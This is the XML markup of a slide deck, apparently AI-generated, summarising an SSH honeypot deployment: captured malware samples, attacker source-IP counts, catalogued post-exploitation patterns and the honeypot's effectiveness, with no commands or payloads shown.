            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5262734" h="1271827">
                <a:moveTo>
                  <a:pt x="35090" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5227644" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5247024" y="0"/>
                  <a:pt x="5262734" y="15710"/>
                  <a:pt x="5262734" y="35090"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5262734" y="1236738"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5262734" y="1256117"/>
                  <a:pt x="5247024" y="1271827"/>
                  <a:pt x="5227644" y="1271827"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="35090" y="1271827"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="15710" y="1271827"/>
                  <a:pt x="0" y="1256117"/>
                  <a:pt x="0" y="1236738"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="35090"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="15723"/>
                  <a:pt x="15723" y="0"/>
                  <a:pt x="3509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500436" y="2701537"/>
            <a:ext cx="510485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Characteristics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525653" y="2982216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1" name="Text 39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6724102" y="2947131"/>
            <a:ext cx="228051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Consistent three-phase post-exploitation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525653" y="3192725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3" name="Text 41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6724102" y="3157640"/>
            <a:ext cx="1955983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Standardized command sequences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525653" y="3403235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5" name="Text 43"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6724102" y="3368150"/>
            <a:ext cx="2017381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Rapid execution (&lt;60 seconds total)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525653" y="3613744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7" name="Text 45"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6724102" y="3578659"/>
            <a:ext cx="1955983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Distributed source IPs (812 unique)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06600" y="4197030"/>
            <a:ext cx="5631125" cy="2657681"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5631125" h="2657681">
                <a:moveTo>
                  <a:pt x="70163" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5560962" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5599712" y="0"/>
                  <a:pt x="5631125" y="31413"/>
                  <a:pt x="5631125" y="70163"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5631125" y="2587518"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5631125" y="2626268"/>
                  <a:pt x="5599712" y="2657681"/>
                  <a:pt x="5560962" y="2657681"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="70163" y="2657681"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="31413" y="2657681"/>
                  <a:pt x="0" y="2626268"/>
                  <a:pt x="0" y="2587518"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="70163"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="31413"/>
                  <a:pt x="31413" y="0"/>
                  <a:pt x="70163" y="0"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="262626"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="10B981">
                <a:alpha val="4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386410" y="4376840"/>
            <a:ext cx="350849" cy="350849"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="350849" h="350849">
                <a:moveTo>
                  <a:pt x="70170" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="280679" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="319433" y="0"/>
                  <a:pt x="350849" y="31416"/>
                  <a:pt x="350849" y="70170"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="350849" y="280679"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="350849" y="319433"/>
                  <a:pt x="319433" y="350849"/>
                  <a:pt x="280679" y="350849"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="70170" y="350849"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="31416" y="350849"/>
                  <a:pt x="0" y="319433"/>
                  <a:pt x="0" y="28067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10B981">
              <a:alpha val="2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485086" y="4473324"/>
            <a:ext cx="157882" cy="157882"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="157882" h="157882">
                <a:moveTo>
                  <a:pt x="78941" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="80359" y="0"/>
                  <a:pt x="81778" y="308"/>
                  <a:pt x="83073" y="894"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="141169" y="25532"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="147953" y="28400"/>
                  <a:pt x="153010" y="35092"/>
                  <a:pt x="152979" y="43171"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="152825" y="73761"/>
                  <a:pt x="140244" y="129728"/>
                  <a:pt x="87113" y="155168"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="81963" y="157635"/>
                  <a:pt x="75981" y="157635"/>
                  <a:pt x="70831" y="155168"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="17669" y="129728"/>
                  <a:pt x="5119" y="73761"/>
                  <a:pt x="4965" y="43171"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4934" y="35092"/>
                  <a:pt x="9991" y="28400"/>
                  <a:pt x="16775" y="25532"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="74840" y="894"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="76135" y="308"/>
                  <a:pt x="77523" y="0"/>
                  <a:pt x="78941" y="0"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="78941" y="20599"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="78941" y="137191"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="121495" y="116592"/>
                  <a:pt x="132935" y="70954"/>
                  <a:pt x="133213" y="43633"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="78941" y="20630"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="78941" y="20630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1" name="Text 49"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6842513" y="4429468"/>
            <a:ext cx="194721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Honeypot Effectiveness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86410" y="4832944"/>
            <a:ext cx="5341675" cy="45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honeypot successfully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highlight>
                  <a:srgbClr val="10B981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isolated threats </a:t>
            </a:r>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1105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preventing actual damage to the host system while providing critical data on current cyber threat trends.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90795" y="5398688"/>
            <a:ext cx="5262734" cy="1271827"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5262734" h="1271827">
                <a:moveTo>
                  <a:pt x="35090" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5227644" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5247024" y="0"/>
                  <a:pt x="5262734" y="15710"/>
                  <a:pt x="5262734" y="35090"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5262734" y="1236738"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5262734" y="1256117"/>
                  <a:pt x="5247024" y="1271827"/>
                  <a:pt x="5227644" y="1271827"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="35090" y="1271827"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="15710" y="1271827"/>
                  <a:pt x="0" y="1256117"/>
                  <a:pt x="0" y="1236738"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="35090"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="15723"/>
                  <a:pt x="15723" y="0"/>
                  <a:pt x="35090" y="0"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="191919"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="333333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6500436" y="5508328"/>
            <a:ext cx="5104852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8F8F8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Intelligence Value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525653" y="5789007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6" name="Text 54"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6724102" y="5753922"/>
            <a:ext cx="2315603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22 malware samples captured for analysis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525653" y="5999517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8" name="Text 56"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6724102" y="5964432"/>
            <a:ext cx="221034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 attack pattern documentation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525653" y="6210026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0" name="Text 58"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6724102" y="6174941"/>
            <a:ext cx="2227891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Attacker TTPs identified and catalogued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525653" y="6420535"/>
            <a:ext cx="107447" cy="122797"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="107447" h="122797">
                <a:moveTo>
                  <a:pt x="104282" y="16813"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="107711" y="19307"/>
                  <a:pt x="108479" y="24104"/>
                  <a:pt x="105984" y="27533"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="44586" y="111956"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="43267" y="113779"/>
                  <a:pt x="41228" y="114906"/>
                  <a:pt x="38974" y="115098"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="36719" y="115290"/>
                  <a:pt x="34537" y="114451"/>
                  <a:pt x="32954" y="112868"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2254" y="82169"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="-743" y="79171"/>
                  <a:pt x="-743" y="74302"/>
                  <a:pt x="2254" y="71304"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5252" y="68306"/>
                  <a:pt x="10121" y="68306"/>
                  <a:pt x="13119" y="71304"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="37463" y="95647"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="93585" y="18492"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="96079" y="15062"/>
                  <a:pt x="100876" y="14294"/>
                  <a:pt x="104306" y="1678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2" name="Text 60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6724102" y="6385450"/>
            <a:ext cx="169284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EFEF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host system compromise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SSH Honeypot Deployment &amp; Threat Analysis</dc:title>
  <dc:subject>SSH Honeypot Deployment &amp; Threat Analysis</dc:subject>
  <dc:creator>Kimi</dc:creator>
  <cp:lastModifiedBy>Kimi</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-02-06T05:34:26Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-02-06T05:34:26Z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{"Label":"SSH Honeypot Deployment &amp; Threat Analysis","ContentProducer":"001191110108MACG2KBH8F10000","ProduceID":"19c31445-cff2-80f0-8000-0000e5e15da0","ReservedCode1":"","ContentPropagator":"001191110108MACG2KBH8F20000","PropagateID":"19c31445-cff2-80f0-8000-0000e5e15da0","ReservedCode2":""}</vt:lpwstr>
  </property>
</Properties>
</file>